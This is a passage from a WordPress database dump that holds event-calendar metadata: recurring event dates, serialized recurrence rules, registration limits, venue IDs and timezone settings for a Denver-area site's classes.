";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116664,262868,'_EventStartDate','2021-10-03 09:00:00'),(116665,262868,'_EventStartDateUTC','2021-10-03 15:00:00'),(116666,262868,'_EventEndDate','2021-10-03 10:15:00'),(116667,262868,'_EventEndDateUTC','2021-10-03 16:15:00'),(116668,262868,'_EventDuration','4500'),(118730,262916,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_EventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(118731,262916,'protect_children',''),(118555,262868,'_RTECregistrationsDisabled','1'),(118556,262868,'_RTECdeadlineType','start'),(118557,262868,'_RTECwhoCanRegister','any'),(118558,262868,'_RTEClimitRegistrations','0'),(118553,262868,'_EventOrigin','events-calendar'),(118561,262868,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(79928,130320,'protect_children',''),(14739,129179,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(14740,129179,'_EventShowMapLink','1'),(14736,129179,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";d:1566041362;s:13:\"_thumbnail_id\";d:1566041362;s:24:\"boldgrid_hide_page_title\";d:1566041362;s:16:\"_EventRecurrence\";i:1606922281;s:17:\"_EventShowMapLink\";d:1566041362;s:13:\"_EventShowMap\";d:1566041362;s:13:\"_EventVenueID\";d:1566041362;s:15:\"_EventStartDate\";i:1577651821;s:13:\"_EventEndDate\";i:1577651821;s:18:\"_EventStartDateUTC\";i:1577651821;s:16:\"_EventEndDateUTC\";i:1577651821;s:14:\"_EventDuration\";i:1577651821;s:20:\"_EventCurrencySymbol\";d:1566041362;s:22:\"_EventCurrencyPosition\";d:1566041362;s:10:\"_EventCost\";d:1566041362;s:9:\"_EventURL\";d:1566041362;s:14:\"_EventTimezone\";d:1566041362;s:18:\"_EventTimezoneAbbr\";i:1577651821;s:27:\"_EventNextPendingRecurrence\";i:1605018033;s:12:\"_dp_original\";d:1566041362;s:16:\"tribe_events_cat\";i:1606947481;s:10:\"_edit_last\";d:1566041428;s:10:\"post_title\";d:1566041428;s:12:\"post_content\";i:1580468535;s:11:\"post_status\";d:1566041616;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922294;s:16:\"protect_children\";i:1577651821;s:26:\"_RTECregistrationsDisabled\";i:1606922281;s:17:\"_RTECdeadlineType\";i:1606922281;s:19:\"_RTECwhoCanRegister\";i:1606922281;s:23:\"_RTEClimitRegistrations\";i:1606922281;s:21:\"_RTECmaxRegistrations\";i:1606922281;s:22:\"_EventHideFromUpcoming\";i:1606922281;}'),(14738,129179,'boldgrid_hide_page_title','0'),(14741,129179,'_EventShowMap','1'),(14742,129179,'_EventVenueID','52069'),(14743,129179,'_EventStartDate','2020-01-08 19:00:00'),(14744,129179,'_EventEndDate','2020-01-08 20:30:00'),(14745,129179,'_EventStartDateUTC','2020-01-09 02:00:00'),(14746,129179,'_EventEndDateUTC','2020-01-09 03:30:00'),(14747,129179,'_EventDuration','5400'),(14748,129179,'_EventCurrencySymbol',''),(14749,129179,'_EventCurrencyPosition','prefix'),(14750,129179,'_EventCost',''),(14751,129179,'_EventURL',''),(14752,129179,'_EventTimezone','America/Denver'),(14753,129179,'_EventTimezoneAbbr','MST'),(96965,129179,'_EventNextPendingRecurrence','2022-12-14 19:00:00'),(14756,129179,'_dp_original','128992'),(14757,129179,'_edit_lock','1606947726:2'),(14758,129179,'_edit_last','2'),(125310,263323,'_EventOrigin','events-calendar'),(124941,263333,'_EventStartDateUTC','2021-10-12 01:00:00'),(129902,263591,'_dp_original','263319'),(129880,263591,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(125306,263323,'protect_children',''),(125307,263323,'protect_children',''),(124610,263323,'_EventStartDate','2020-12-14 19:00:00'),(124611,263323,'_EventStartDateUTC','2020-12-15 02:00:00'),(124612,263323,'_EventEndDate','2020-12-14 20:30:00'),(125311,263323,'_EventOrigin','events-calendar'),(124613,263323,'_EventEndDateUTC','2020-12-15 03:30:00'),(127827,263286,'_EventShowMapLink','1'),(127828,263286,'_EventShowMap','1'),(123470,263286,'_EventStartDate','2021-02-15 19:00:00'),(123471,263286,'_EventStartDateUTC','2021-02-16 02:00:00'),(123472,263286,'_EventEndDate','2021-02-15 20:30:00'),(123473,263286,'_EventEndDateUTC','2021-02-16 03:30:00'),(123474,263286,'_EventDuration','5400'),(127818,263286,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610634925;s:12:\"_EventOrigin\";i:1610634925;s:24:\"boldgrid_hide_page_title\";i:1610634925;s:16:\"_EventRecurrence\";i:1610634925;s:17:\"_EventShowMapLink\";i:1610634925;s:13:\"_EventShowMap\";i:1610634925;s:20:\"_EventCurrencySymbol\";i:1610634925;s:22:\"_EventCurrencyPosition\";i:1610634925;s:10:\"_EventCost\";i:1610634925;s:9:\"_EventURL\";i:1610634925;s:14:\"_EventTimezone\";i:1610634925;s:26:\"_RTECregistrationsDisabled\";i:1610634925;s:17:\"_RTECdeadlineType\";i:1610634925;s:19:\"_RTECwhoCanRegister\";i:1610634925;s:23:\"_RTEClimitRegistrations\";i:1610634925;s:21:\"_RTECmaxRegistrations\";i:1610634925;s:13:\"_EventVenueID\";i:1610634925;s:13:\"_thumbnail_id\";i:1610634925;s:12:\"_wp_old_slug\";i:1610634925;s:12:\"_dp_original\";i:1610634925;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610634925;}'),(127819,263286,'protect_children',''),(127820,263286,'protect_children',''),(127821,263286,'_EventOrigin','events-calendar'),(127822,263286,'_EventOrigin','events-calendar'),(127823,263286,'_EventOrigin','events-calendar'),(127824,263286,'_EventOrigin','events-calendar'),(127825,263286,'boldgrid_hide_page_title','1'),(127826,263286,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-02-15\";s:14:\"EventStartDate\";s:19:\"2021-01-18 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-18 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(127829,263286,'_EventCurrencySymbol',''),(127830,263286,'_EventCurrencyPosition','prefix'),(127831,263286,'_EventCost',''),(127832,263286,'_EventURL',''),(127833,263286,'_EventTimezone','America/Denver'),(127834,263286,'_RTECregistrationsDisabled','1'),(127835,263286,'_RTECdeadlineType','start'),(127836,263286,'_RTECwhoCanRegister','any'),(127837,263286,'_RTEClimitRegistrations','0'),(127838,263286,'_RTECmaxRegistrations','30'),(127839,263286,'_EventVenueID','262507'),(127841,263286,'_wp_old_slug','soul-travel-2-class'),(127842,263286,'_wp_old_slug','the-easy-way'),(127843,263286,'_dp_original','225018'),(127844,263286,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610634925;s:12:\"_EventOrigin\";i:1610634925;s:24:\"boldgrid_hide_page_title\";i:1610634925;s:16:\"_EventRecurrence\";i:1610634925;s:17:\"_EventShowMapLink\";i:1610634925;s:13:\"_EventShowMap\";i:1610634925;s:20:\"_EventCurrencySymbol\";i:1610634925;s:22:\"_EventCurrencyPosition\";i:1610634925;s:10:\"_EventCost\";i:1610634925;s:9:\"_EventURL\";i:1610634925;s:14:\"_EventTimezone\";i:1610634925;s:26:\"_RTECregistrationsDisabled\";i:1610634925;s:17:\"_RTECdeadlineType\";i:1610634925;s:19:\"_RTECwhoCanRegister\";i:1610634925;s:23:\"_RTEClimitRegistrations\";i:1610634925;s:21:\"_RTECmaxRegistrations\";i:1610634925;s:13:\"_EventVenueID\";i:1610634925;s:13:\"_thumbnail_id\";i:1610634925;s:12:\"_wp_old_slug\";i:1610634925;s:12:\"_dp_original\";i:1610634925;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610634925;}'),(127845,263286,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:1:{i:263286;a:2:{s:9:\"timestamp\";i:1613415600;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:5:{i:263297;a:2:{s:9:\"timestamp\";i:1642446000;s:8:\"duration\";i:5400;}i:263298;a:2:{s:9:\"timestamp\";i:1645470000;s:8:\"duration\";i:5400;}i:263312;a:2:{s:9:\"timestamp\";i:1645470000;s:8:\"duration\";i:5400;}i:263313;a:2:{s:9:\"timestamp\";i:1645470000;s:8:\"duration\";i:5400;}i:263314;a:2:{s:9:\"timestamp\";i:1645470000;s:8:\"duration\";i:5400;}}s:7:\"exclude\";a:0:{}s:8:\"original\";i:16;}'),(128158,263426,'_EventStartDate','2021-09-26 10:00:00'),(128159,263426,'_EventStartDateUTC','2021-09-26 16:00:00'),(128160,263426,'_EventEndDate','2021-09-26 12:00:00'),(128161,263426,'_EventEndDateUTC','2021-09-26 18:00:00'),(128162,263426,'_EventDuration','7200'),(128453,263426,'_EventOrigin','events-calendar'),(128455,263426,'_RTECregistrationsDisabled','1'),(128456,263426,'_RTECdeadlineType','start'),(128457,263426,'_RTECwhoCanRegister','any'),(128458,263426,'_RTEClimitRegistrations','0'),(128459,263426,'_RTECmaxRegistrations','30'),(128451,263426,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635209;s:12:\"_EventOrigin\";i:1610635209;s:13:\"_thumbnail_id\";i:1610635209;s:26:\"_RTECregistrationsDisabled\";i:1610635209;s:17:\"_RTECdeadlineType\";i:1610635209;s:19:\"_RTECwhoCanRegister\";i:1610635209;s:23:\"_RTEClimitRegistrations\";i:1610635209;s:21:\"_RTECmaxRegistrations\";i:1610635209;s:24:\"boldgrid_hide_page_title\";i:1610635209;s:16:\"_EventRecurrence\";i:1610635209;s:17:\"_EventShowMapLink\";i:1610635209;s:13:\"_EventShowMap\";i:1610635209;s:13:\"_EventVenueID\";i:1610635209;s:20:\"_EventCurrencySymbol\";i:1610635209;s:22:\"_EventCurrencyPosition\";i:1610635209;s:10:\"_EventCost\";i:1610635209;s:9:\"_EventURL\";i:1610635209;s:14:\"_EventTimezone\";i:1610635209;s:12:\"_dp_original\";i:1610635209;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635209;s:16:\"tribe_events_cat\";i:1610660409;}'),(128452,263426,'_EventOrigin','events-calendar'),(128470,263426,'_dp_original','263362'),(128471,263426,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128460,263426,'boldgrid_hide_page_title','0'),(128461,263426,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128462,263426,'_EventShowMapLink','1'),(128463,263426,'_EventShowMap','1'),(128464,263426,'_EventVenueID','262305'),(128465,263426,'_EventCurrencySymbol',''),(128466,263426,'_EventCurrencyPosition','prefix'),(128467,263426,'_EventCost',''),(128468,263426,'_EventURL',''),(128469,263426,'_EventTimezone','America/Denver'),(128448,263426,'protect_children',''),(128449,263426,'protect_children',''),(128450,263426,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635209;s:12:\"_EventOrigin\";i:1610635209;s:13:\"_thumbnail_id\";i:1610635209;s:26:\"_RTECregistrationsDisabled\";i:1610635209;s:17:\"_RTECdeadlineType\";i:1610635209;s:19:\"_RTECwhoCanRegister\";i:1610635209;s:23:\"_RTEClimitRegistrations\";i:1610635209;s:21:\"_RTECmaxRegistrations\";i:1610635209;s:24:\"boldgrid_hide_page_title\";i:1610635209;s:16:\"_EventRecurrence\";i:1610635209;s:17:\"_EventShowMapLink\";i:1610635209;s:13:\"_EventShowMap\";i:1610635209;s:13:\"_EventVenueID\";i:1610635209;s:20:\"_EventCurrencySymbol\";i:1610635209;s:22:\"_EventCurrencyPosition\";i:1610635209;s:10:\"_EventCost\";i:1610635209;s:9:\"_EventURL\";i:1610635209;s:14:\"_EventTimezone\";i:1610635209;s:12:\"_dp_original\";i:1610635209;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635209;s:16:\"tribe_events_cat\";i:1610660409;}'),(128447,263426,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635209;s:12:\"_EventOrigin\";i:1610635209;s:13:\"_thumbnail_id\";i:1610635209;s:26:\"_RTECregistrationsDisabled\";i:1610635209;s:17:\"_RTECdeadlineType\";i:1610635209;s:19:\"_RTECwhoCanRegister\";i:1610635209;s:23:\"_RTEClimitRegistrations\";i:1610635209;s:21:\"_RTECmaxRegistrations\";i:1610635209;s:24:\"boldgrid_hide_page_title\";i:1610635209;s:16:\"_EventRecurrence\";i:1610635209;s:17:\"_EventShowMapLink\";i:1610635209;s:13:\"_EventShowMap\";i:1610635209;s:13:\"_EventVenueID\";i:1610635209;s:20:\"_EventCurrencySymbol\";i:1610635209;s:22:\"_EventCurrencyPosition\";i:1610635209;s:10:\"_EventCost\";i:1610635209;s:9:\"_EventURL\";i:1610635209;s:14:\"_EventTimezone\";i:1610635209;s:12:\"_dp_original\";i:1610635209;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635209;s:16:\"tribe_events_cat\";i:1610660409;}'),(128191,263427,'_EventStartDate','2021-10-31 10:00:00'),(128192,263427,'_EventStartDateUTC','2021-10-31 16:00:00'),(128193,263427,'_EventEndDate','2021-10-31 12:00:00'),(128194,263427,'_EventEndDateUTC','2021-10-31 18:00:00'),(128195,263427,'_EventDuration','7200'),(128791,263427,'boldgrid_hide_page_title','0'),(128792,263427,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128784,263427,'_EventOrigin','events-calendar'),(128786,263427,'_RTECregistrationsDisabled','1'),(128787,263427,'_RTECdeadlineType','start'),(128788,263427,'_RTECwhoCanRegister','any'),(128789,263427,'_RTEClimitRegistrations','0'),(128790,263427,'_RTECmaxRegistrations','30'),(128782,263427,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635835;s:12:\"_EventOrigin\";i:1610635835;s:13:\"_thumbnail_id\";i:1610635835;s:26:\"_RTECregistrationsDisabled\";i:1610635835;s:17:\"_RTECdeadlineType\";i:1610635835;s:19:\"_RTECwhoCanRegister\";i:1610635835;s:23:\"_RTEClimitRegistrations\";i:1610635835;s:21:\"_RTECmaxRegistrations\";i:1610635835;s:24:\"boldgrid_hide_page_title\";i:1610635835;s:16:\"_EventRecurrence\";i:1610635835;s:17:\"_EventShowMapLink\";i:1610635835;s:13:\"_EventShowMap\";i:1610635835;s:13:\"_EventVenueID\";i:1610635835;s:20:\"_EventCurrencySymbol\";i:1610635835;s:22:\"_EventCurrencyPosition\";i:1610635835;s:10:\"_EventCost\";i:1610635835;s:9:\"_EventURL\";i:1610635835;s:14:\"_EventTimezone\";i:1610635835;s:12:\"_dp_original\";i:1610635835;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635835;s:16:\"tribe_events_cat\";i:1610661035;}'),(128783,263427,'_EventOrigin','events-calendar'),(128793,263427,'_EventShowMapLink','1'),(128794,263427,'_EventShowMap','1'),(128795,263427,'_EventVenueID','262305'),(128796,263427,'_EventCurrencySymbol',''),(128797,263427,'_EventCurrencyPosition','prefix'),(128798,263427,'_EventCost',''),(128799,263427,'_EventURL',''),(128800,263427,'_EventTimezone','America/Denver'),(128801,263427,'_dp_original','263362'),(128802,263427,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:1:{i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128779,263427,'protect_children',''),(128780,263427,'protect_children',''),(128781,263427,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635835;s:12:\"_EventOrigin\";i:1610635835;s:13:\"_thumbnail_id\";i:1610635835;s:26:\"_RTECregistrationsDisabled\";i:1610635835;s:17:\"_RTECdeadlineType\";i:1610635835;s:19:\"_RTECwhoCanRegister\";i:1610635835;s:23:\"_RTEClimitRegistrations\";i:1610635835;s:21:\"_RTECmaxRegistrations\";i:1610635835;s:24:\"boldgrid_hide_page_title\";i:1610635835;s:16:\"_EventRecurrence\";i:1610635835;s:17:\"_EventShowMapLink\";i:1610635835;s:13:\"_EventShowMap\";i:1610635835;s:13:\"_EventVenueID\";i:1610635835;s:20:\"_EventCurrencySymbol\";i:1610635835;s:22:\"_EventCurrencyPosition\";i:1610635835;s:10:\"_EventCost\";i:1610635835;s:9:\"_EventURL\";i:1610635835;s:14:\"_EventTimezone\";i:1610635835;s:12:\"_dp_original\";i:1610635835;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635835;s:16:\"tribe_events_cat\";i:1610661035;}'),(128774,31882,'passster_activate_protection',NULL),(128775,31882,'passster_protection_type','password'),(128776,32074,'passster_activate_protection',NULL),(128778,263427,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635835;s:12:\"_EventOrigin\";i:1610635835;s:13:\"_thumbnail_id\";i:1610635835;s:26:\"_RTECregistrationsDisabled\";i:1610635835;s:17:\"_RTECdeadlineType\";i:1610635835;s:19:\"_RTECwhoCanRegister\";i:1610635835;s:23:\"_RTEClimitRegistrations\";i:1610635835;s:21:\"_RTECmaxRegistrations\";i:1610635835;s:24:\"boldgrid_hide_page_title\";i:1610635835;s:16:\"_EventRecurrence\";i:1610635835;s:17:\"_EventShowMapLink\";i:1610635835;s:13:\"_EventShowMap\";i:1610635835;s:13:\"_EventVenueID\";i:1610635835;s:20:\"_EventCurrencySymbol\";i:1610635835;s:22:\"_EventCurrencyPosition\";i:1610635835;s:10:\"_EventCost\";i:1610635835;s:9:\"_EventURL\";i:1610635835;s:14:\"_EventTimezone\";i:1610635835;s:12:\"_dp_original\";i:1610635835;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635835;s:16:\"tribe_events_cat\";i:1610661035;}'),(128910,263459,'_RTECmaxRegistrations','30'),(119958,263006,'_EventOrigin','events-calendar'),(119959,263006,'_EventOrigin','events-calendar'),(119954,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(17870,129808,'_EventStartDate','2019-09-27 19:00:00'),(17866,129808,'boldgrid_hide_page_title','0'),(17877,129808,'_EventCost',''),(104665,262482,'_field_180','Brock Young'),(125470,263329,'_EventShowMapLink','1'),(125471,263329,'_EventShowMap','1'),(125472,263329,'_EventVenueID','262507'),(125473,263329,'_EventCurrencySymbol',''),(125474,263329,'_EventCurrencyPosition','prefix'),(125475,263329,'_EventCost',''),(125476,263329,'_EventURL',''),(125477,263329,'_EventTimezone','America/Denver'),(125478,263329,'_dp_original','263319'),(125479,263329,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(124810,263329,'_EventEndDate','2021-06-14 20:30:00'),(124811,263329,'_EventEndDateUTC','2021-06-15 02:30:00'),(124842,263330,'_EventStartDateUTC','2021-07-13 01:00:00'),(124812,263329,'_EventDuration','5400'),(125456,263329,'protect_children',''),(125457,263329,'protect_children',''),(125458,263329,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125459,263329,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125468,263329,'boldgrid_hide_page_title','0'),(125469,263329,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 